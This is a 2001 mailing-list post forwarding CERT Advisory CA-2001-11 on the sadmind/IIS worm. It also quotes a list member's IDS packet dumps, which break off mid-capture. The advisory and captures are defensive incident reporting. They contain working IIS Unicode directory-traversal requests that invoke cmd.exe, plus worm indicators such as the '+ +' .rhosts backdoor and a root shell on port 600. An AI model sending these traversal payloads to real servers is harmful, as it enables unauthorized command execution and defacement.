you may want to check this out! **************************************************** CERT Advisory CA-2001-11 sadmind/IIS Worm Original release date: May 08, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running unpatched versions of Microsoft IIS * Systems running unpatched versions of Solaris up to, and including, Solaris 7 Overview The CERT/CC has received reports of a new piece of self-propagating malicious code (referred to here as the sadmind/IIS worm). The worm uses two well-known vulnerabilities to compromise systems and deface web pages. I. Description Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris systems and subsequently installs software to attack Microsoft IIS web servers. In addition, it includes a component to propagate itself automatically to other vulnerable Solaris systems. It will add "+ +" to the .rhosts file in the root user's home directory. Finally, it will modify the index.html on the host Solaris system after compromising 2,000 IIS systems. To compromise the Solaris systems, the worm takes advantage of a two-year-old buffer overflow vulnerability in the Solstice sadmind program. For more information on this vulnerability, see http://www.kb.cert.org/vuls/id/28934 http://www.cert.org/advisories/CA-1999-16.html After successfully compromising the Solaris systems, it uses a seven-month-old vulnerability to compromise the IIS systems. For additional information about this vulnerability, see http://www.kb.cert.org/vuls/id/111677 Solaris systems that are successfully compromised via the worm exhibit the following characteristics: * Sample syslog entry from compromised Solaris system May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - c ore dumped May 7 02:40:01 carrier.domain.com last message repeated 1 time May 7 02:40:03 carrier.domain.com last message repeated 1 time May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped May 7 02:40:03 carrier.domain.com last message repeated 1 time May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup May 7 02:40:08 carrier.domain.com last message repeated 1 time May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed * A rootshell listening on TCP port 600 * Existence of the directories * /dev/cub contains logs of compromised machines * /dev/cuc contains tools that the worm uses to operate and propagate Running processes of the scripts associated with the worm, such as the following: * /bin/sh /dev/cuc/sadmin.sh * /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111 * /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80 * /bin/sh /dev/cuc/uniattack.sh * /bin/sh /dev/cuc/time.sh * /usr/sbin/inetd -s /tmp/.f * /bin/sleep 300 Microsoft IIS servers that are successfully compromised exhibit the following characteristics: * Modified web pages that read as follows: fuck USA Government fuck PoizonBOx contact:sysadmcnat_private * Sample Log from Attacked IIS Server 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/../../winnt/system32/cmd.exe \ /c+copy+\winnt\system32\cmd.exe+root.exe 502 - 2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 \ GET /scripts/root.exe /c+echo+\ <HTML code inserted here>.././index.asp 502 - II. Impact Solaris systems compromised by this worm are being used to scan and compromise other Solaris and IIS systems. IIS systems compromised by this worm can suffer modified web content. Intruders can use the vulnerabilities exploited by this worm to execute arbitrary code with root privileges on vulnerable Solaris systems, and arbitrary commands with the privileges of the IUSR_machinename account on vulnerable Windows systems. We are receiving reports of other activity, including one report of files being destroyed on the compromised Windows machine, rendering them unbootable. It is unclear at this time if this activity is directly related to this worm. III. Solutions Apply a patch from your vendor A patch is available from Microsoft at http://www.microsoft.com/technet/security/bulletin/MS00-078.asp For IIS Version 4: http://www.microsoft.com/ntserver/nts/downloads/critical/q26986 2/default.asp For IIS Version 5: http://www.microsoft.com/windows2000/downloads/critical/q269862 /default.asp Additional advice on securing IIS web servers is available from http://www.microsoft.com/technet/security/iis5chk.asp http://www.microsoft.com/technet/security/tools.asp Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=se cbull/191&type=0&nav=sec.sba Appendix A. Vendor Information Microsoft Corporation The following documents regarding this vulnerability are available from Microsoft: http://www.microsoft.com/technet/security/bulletin/MS01-023.asp Sun Microsystems Sun has issued the following bulletin for this vulnerability: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=se cbull/191&type=0&nav=sec.sba References 1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable to directory traversal via extended unicode in url (MS00-078) http://www.kb.cert.org/vuls/id/111677 2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind http://www.cert.org/advisories/CA-1999-16.html Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, Ian Finlay, John Shaffer ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-11.html ______________________________________________________________________ CERT/CC Contact Information Email: certat_private Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomoat_private Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History May 08, 2001: Initial Release -------------------------------------------------------------------- Frank Quinonez Cisco Systems 4 Venture St Suite 100 Systems Engineer || || Irvine, CA 92618 frankqat_private :||: :||: Phone: 949-788-5162 http://www.cisco.com ..:||||:..:||||:.. Pager: 800-365-4578 -------------------------------------------------------------------- Empowering the Internet Generation Changing the way we Work, Live, Learn, and Play. -----Original Message----- From: Incidents Mailing List [mailto:INCIDENTSat_private]On Behalf Of Steve Halligan Sent: Tuesday, May 08, 2001 7:24 AM To: INCIDENTSat_private Subject: 4 similar IIS attempts in a 48 hour period. I got these 4 attempts from different sources in a rather small window of time. They all start out with a portscan of port 80, so I don't think it is the same person (Why would they need to rescan each time?). You will note that the order of the variation of the attempts is similar. Is this a new worm? A new tool? -Steve ----------------BEGIN SCAN REPORTS---------------------- *****************************SCAN #1***************************************** ---------------------------------------------------------------------------- -- #(1 - 2059) [2001-05-05 21:20:45] 305 IPv4: 207.51.58.7 -> 209.46.94.85 hlen=5 TOS=0 dlen=44 ID=19427 flags=0 offset=0 TTL=243 chksum=810 TCP: port=41385 -> dport: 80 flags=******S* seq=3959699664 ack=0 off=6 res=0 win=8760 urp=0 chksum=30305 Options: #1 - MSS len=4 data=05B40000 Payload: none ---------------------------------------------------------------------------- -- #(1 - 2081) [2001-05-06 12:06:16] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59795 flags=0 offset=0 TTL=242 chksum=26174 TCP: port=42384 -> dport: 80 flags=***AP*** seq=4087665554 ack=2688221853 off=5 res=0 win=8760 urp=0 chksum=5135 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2082) [2001-05-06 12:06:17] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59801 flags=0 offset=0 TTL=242 chksum=26168 TCP: port=42746 -> dport: 80 flags=***AP*** seq=4111537358 ack=2688221866 off=5 res=0 win=8760 urp=0 chksum=54038 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2083) [2001-05-06 12:06:18] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59807 flags=0 offset=0 TTL=242 chksum=26162 TCP: port=43046 -> dport: 80 flags=***AP*** seq=4129406045 ack=2688221880 off=5 res=0 win=8760 urp=0 chksum=10502 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2084) [2001-05-06 12:06:19] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59813 flags=0 offset=0 TTL=242 chksum=26156 TCP: port=44051 -> dport: 80 flags=***AP*** seq=4191243658 ack=2688221889 off=5 res=0 win=8760 urp=0 chksum=32107 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2085) [2001-05-06 12:06:20] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59819 flags=0 offset=0 TTL=242 chksum=26150 TCP: port=45036 -> dport: 80 flags=***AP*** seq=4254676574 ack=2688221904 off=5 res=0 win=8760 urp=0 chksum=40111 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2086) [2001-05-06 12:06:21] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59825 flags=0 offset=0 TTL=242 chksum=26144 TCP: port=45723 -> dport: 80 flags=***AP*** seq=3643186 ack=2688221913 off=5 res=0 win=8760 urp=0 chksum=10686 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2087) [2001-05-06 12:06:22] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59831 flags=0 offset=0 TTL=242 chksum=26138 TCP: port=46489 -> dport: 80 flags=***AP*** seq=54010263 ack=2688221922 off=5 res=0 win=8760 urp=0 chksum=43352 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2088) [2001-05-06 12:06:23] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59837 flags=0 offset=0 TTL=242 chksum=26132 TCP: port=47320 -> dport: 80 flags=***AP*** seq=104581118 ack=2688221936 off=5 res=0 win=8760 urp=0 chksum=64664 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2089) [2001-05-06 12:06:24] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=59843 flags=0 offset=0 TTL=242 chksum=26126 TCP: port=48175 -> dport: 80 flags=***AP*** seq=160395667 ack=2688221939 off=5 res=0 win=8760 urp=0 chksum=18734 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2090) [2001-05-06 12:06:25] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=109 ID=59849 flags=0 offset=0 TTL=242 chksum=26117 TCP: port=49033 -> dport: 80 flags=***AP*** seq=213665368 ack=2688221947 off=5 res=0 win=8760 urp=0 chksum=38432 Payload: length = 63 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2091) [2001-05-06 12:06:26] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=112 ID=59855 flags=0 offset=0 TTL=242 chksum=26108 TCP: port=49954 -> dport: 80 flags=***AP*** seq=270239886 ack=2688221961 off=5 res=0 win=8760 urp=0 chksum=37899 Payload: length = 64 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/... 010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst 020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2092) [2001-05-06 12:06:27] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=115 ID=59861 flags=0 offset=0 TTL=242 chksum=26099 TCP: port=50870 -> dport: 80 flags=***AP*** seq=328007726 ack=2688221972 off=5 res=0 win=8760 urp=0 chksum=16280 Payload: length = 65 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/... 010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys 020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0... 040 : 0A . ---------------------------------------------------------------------------- -- #(1 - 2093) [2001-05-06 12:06:28] 62 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=118 ID=59867 flags=0 offset=0 TTL=242 chksum=26090 TCP: port=51840 -> dport: 80 flags=***AP*** seq=378946693 ack=2688221985 off=5 res=0 win=8760 urp=0 chksum=15453 Payload: length = 66 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/... 010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy 020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 040 : 0D 0A .. ---------------------------------------------------------------------------- -- #(1 - 2094) [2001-05-06 12:06:29] 56 IPv4: 207.51.58.7 -> 209.46.94.82 hlen=5 TOS=0 dlen=135 ID=59873 flags=0 offset=0 TTL=242 chksum=26067 TCP: port=52623 -> dport: 80 flags=***AP*** seq=427404423 ack=2688221992 off=5 res=0 win=8760 urp=0 chksum=12179 Payload: length = 77 000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0 010 : 2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8 020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3 030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir 040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0.... ****************************SCAN #2******************************************* ---------------------------------------------------------------------------- -- #(1 - 2075) [2001-05-06 11:25:12] 317 IPv4: 207.78.143.235 -> 209.46.94.85 hlen=5 TOS=0 dlen=44 ID=33343 flags=0 offset=0 TTL=239 chksum=31438 TCP: port=56344 -> dport: 80 flags=******S* seq=823530689 ack=0 off=6 res=0 win=8760 urp=0 chksum=50416 Options: #1 - MSS len=4 data=05B40000 Payload: none ---------------------------------------------------------------------------- -- #(1 - 2121) [2001-05-06 18:08:07] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24567 flags=0 offset=0 TTL=239 chksum=40155 TCP: port=57118 -> dport: 80 flags=***AP*** seq=3412786496 ack=2693431821 off=5 res=0 win=8760 urp=0 chksum=846 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2122) [2001-05-06 18:08:07] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24573 flags=0 offset=0 TTL=239 chksum=40149 TCP: port=57170 -> dport: 80 flags=***AP*** seq=3415977274 ack=2693431825 off=5 res=0 win=8760 urp=0 chksum=22034 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2123) [2001-05-06 18:08:18] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24582 flags=0 offset=0 TTL=239 chksum=40140 TCP: port=57326 -> dport: 80 flags=***AP*** seq=3426276033 ack=2693431836 off=5 res=0 win=8760 urp=0 chksum=12048 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2124) [2001-05-06 18:08:18] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24587 flags=0 offset=0 TTL=239 chksum=40135 TCP: port=64799 -> dport: 80 flags=***AP*** seq=3904402609 ack=2693431838 off=5 res=0 win=8760 urp=0 chksum=16549 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2125) [2001-05-06 18:08:28] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24596 flags=0 offset=0 TTL=239 chksum=40126 TCP: port=65302 -> dport: 80 flags=***AP*** seq=3936366689 ack=2693431853 off=5 res=0 win=8760 urp=0 chksum=37071 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2126) [2001-05-06 18:08:29] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24602 flags=0 offset=0 TTL=239 chksum=40120 TCP: port=39706 -> dport: 80 flags=***AP*** seq=107054918 ack=2693431871 off=5 res=0 win=8760 urp=0 chksum=30028 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2127) [2001-05-06 18:08:29] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24608 flags=0 offset=0 TTL=239 chksum=40114 TCP: port=39709 -> dport: 80 flags=***AP*** seq=107263367 ack=2693431881 off=5 res=0 win=8760 urp=0 chksum=22274 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2128) [2001-05-06 18:08:29] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24614 flags=0 offset=0 TTL=239 chksum=40108 TCP: port=39965 -> dport: 80 flags=***AP*** seq=124410128 ack=2693431890 off=5 res=0 win=8760 urp=0 chksum=45410 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2129) [2001-05-06 18:08:30] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=24620 flags=0 offset=0 TTL=239 chksum=40102 TCP: port=40329 -> dport: 80 flags=***AP*** seq=148806580 ack=2693431906 off=5 res=0 win=8760 urp=0 chksum=26790 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2130) [2001-05-06 18:08:34] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=109 ID=24629 flags=0 offset=0 TTL=239 chksum=40090 TCP: port=40585 -> dport: 80 flags=***AP*** seq=164770468 ack=2693431910 off=5 res=0 win=8760 urp=0 chksum=63492 Payload: length = 63 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 65 30 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 e0../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d 030 : 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A ir HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2131) [2001-05-06 18:08:34] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=112 ID=24635 flags=0 offset=0 TTL=239 chksum=40081 TCP: port=43268 -> dport: 80 flags=***AP*** seq=341732227 ack=2693431920 off=5 res=0 win=8760 urp=0 chksum=61755 Payload: length = 64 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F0 GET /scripts/... 010 : 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 ...../winnt/syst 020 : 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B em32/cmd.exe?/c+ 030 : 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A dir HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2132) [2001-05-06 18:08:38] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=115 ID=24642 flags=0 offset=0 TTL=239 chksum=40071 TCP: port=43341 -> dport: 80 flags=***AP*** seq=346538415 ack=2693431963 off=5 res=0 win=8760 urp=0 chksum=50319 Payload: length = 65 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E F8 GET /scripts/... 010 : 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 ....../winnt/sys 020 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 tem32/cmd.exe?/c 030 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D +dir HTTP/1.0... 040 : 0A . ---------------------------------------------------------------------------- -- #(1 - 2133) [2001-05-06 18:08:38] 62 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=118 ID=24648 flags=0 offset=0 TTL=239 chksum=40062 TCP: port=46205 -> dport: 80 flags=***AP*** seq=530846163 ack=2693431970 off=5 res=0 win=8760 urp=0 chksum=42548 Payload: length = 66 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E FC GET /scripts/... 010 : 80 80 80 80 AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 ......./winnt/sy 020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F stem32/cmd.exe?/ 030 : 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A c+dir HTTP/1.0.. 040 : 0D 0A .. ---------------------------------------------------------------------------- -- #(1 - 2134) [2001-05-06 18:08:42] 56 IPv4: 207.78.143.235 -> 209.46.94.82 hlen=5 TOS=0 dlen=135 ID=24656 flags=0 offset=0 TTL=239 chksum=40037 TCP: port=46362 -> dport: 80 flags=***AP*** seq=541605131 ack=2693431981 off=5 res=0 win=8760 urp=0 chksum=56033 Payload: length = 77 000 : 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 65 30 GET /msadc/..%e0 010 : 